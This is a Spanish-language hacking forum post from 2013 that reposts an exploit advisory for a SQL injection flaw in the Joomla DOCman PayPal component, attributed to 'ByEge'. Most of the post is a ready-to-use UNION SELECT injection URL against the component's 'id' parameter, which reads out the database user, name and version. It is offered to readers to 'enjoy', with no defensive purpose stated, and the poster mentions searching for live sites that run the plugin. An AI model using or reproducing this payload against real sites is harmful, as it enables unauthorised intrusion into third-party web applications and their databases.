Joomla Vulnerabilidad Complemento DOCman Paypal

Iniciado por ZanGetsu, Abril 04, 2013, 09:16:23 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Hola a todos, les paso a dejar una vulnerabilidad
en un complemento de Joomla llamado Docman Paypal, el cual salio
hace poco en 1337day, dicho complemento es de pago por tanto
me impidio a hacer un tutorial (hasta encontrar algun joomla con ese complemento)
pero si les traigo la Injeccion e Info:

#######################################################
#
#  Joomla Component DOCman PayPal <= (id) SQL injection Vulnerability
#
#######################################################
# Author : ByEge
# Author Blog : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
# Date : 28.03.2013
# Download script : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#######################################################
 
# test site vulnerability : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
 
# SQL Union Code : index.php?option=com_docmanpaypal&task=file&id=4+and+false+UnIOn+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,CHAR(60,104,49,62,66,121,69,103,101,60,104,49,62),44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65--
 
#######################################################

El complemente se puede encontrar en la siguiente web y esta disponible para
versiones de Joomla (hasta 2.5): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
con un video tutorial de instalacion, sin mas que decir, disfrutenlo, Saludos !